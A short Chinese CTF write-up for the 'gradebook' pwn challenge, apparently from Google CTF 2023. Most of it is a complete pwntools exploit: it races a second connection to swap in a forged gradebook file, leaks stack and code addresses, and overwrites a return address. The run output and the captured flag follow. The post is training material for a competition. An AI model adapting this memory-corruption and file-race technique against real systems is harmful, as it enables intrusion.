gradebook 打不通的原因找到了
谔谔了,打算放弃了,结果刚爬上床突然想起来,这个 chal 文件是我自己编译的,因为没有在仓库找到二进制文件,然后自己编译的东西栈的排布不太一样 😓
anyways
最终的 exp 长这样
from pwn import *
elf_path = "./chal"
ip = "gradebook.2023.ctfcompetition.com"
port = "1337"
content = 0
context(os='linux',arch='amd64')
if content == 1:
os.system('tmux set mouse on')
context.terminal = ['tmux','splitw','-h']
# p = process(elf_path)
p_fake = process(elf_path)
p = gdb.debug(elf_path)
else:
p = remote(ip, port)
p_fake = remote(ip, port)
r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
# ----------------------------------------------------------
# upload a narmal gradebook
sla(b'PASSWORD:\n', b'pencil')
sla(b'3. QUIT\n\n', b'2')
sla(b'ENTER FILENAME:\n', b'x')
rud(b'GENERATED FILENAME: ')
file_name = ru(b'ENTER')[:44].decode()
f = open("gradebook", "rb")
file_data = f.read()
sla(b'FILE SIZE:\n', str(len(file_data)).encode())
sa(b'SEND BINARY FILE DATA:\n', file_data)
sla(b'3. QUIT\n\n', b'1')
sla(b'ENTER FILENAME:', file_name.encode())
log.success(file_name)
# leak stack_addr
sla(b'6. QUIT\n\n', b'1')
sla(b'CLASS:\n', b'1')
sla(b'COURSE TITLE:\n', b'1')
sla(b'GRADE:\n', b'1')
sla(b'TEACHER:\n', b'1')
sla(b'ROOM:\n', b'1'*4)
sla(b'PERIOD:\n', b'1')
ru(b' 1111 ')
ret_addr = u64(ru(b'\x7f').ljust(8, b'\x00')) + 0x38
leak('ret_addr', ret_addr)
# leak fun_addr
grade_book = 0x4752ADE50000
fake_file = file_data[:0x48]
fake_file += p64(0xffffffffffffffff)
fake_file += p64(ret_addr - grade_book)
fake_file += p64(ret_addr - grade_book)
p_fake.sendlineafter(b'PASSWORD:\n', b'pencil')
p_fake.sendlineafter(b'3. QUIT\n\n', b'2')
p_fake.sendlineafter(b'ENTER FILENAME:\n', file_name.encode())
p_fake.sendlineafter(b'ENTER FILE SIZE:\n', str(len(fake_file)).encode())
p_fake.sendafter(b'SEND BINARY FILE DATA:\n', fake_file)
sla(b'6. QUIT\n\n', b'2')
sla(b'WHICH GRADE:\n', b'0')
ru(b'\x0a ')
fun_addr = u64(rud(b' ').ljust(8, b'\x00'))
leak('fun_addr', fun_addr)
# change ret addr
sla(b'6. QUIT\n\n', b'1')
sla(b'CLASS:\n', p64(fun_addr - 0xc93))
sla(b'COURSE TITLE:\n', b'1')
sla(b'GRADE:\n', b'1')
sla(b'TEACHER:\n', b'1')
sla(b'ROOM:\n', b'1'*4)
sla(b'PERIOD:\n', b'1')
p.interactive()
就可以打通了
[+] Opening connection to gradebook.2023.ctfcompetition.com on port 1337: Done
[+] Opening connection to gradebook.2023.ctfcompetition.com on port 1337: Done
[+] /tmp/grades_041b92931f41f2b08fcb4a5fa0585999
[+] ret_addr = 0x7ffe07582fe8
[+] fun_addr = 0x55659d79a386
[*] Switching to interactive mode
CTF{mm4p_p4rs1ng_c0nsid3red_h4rmfu1}
[*] Got EOF while reading in interactive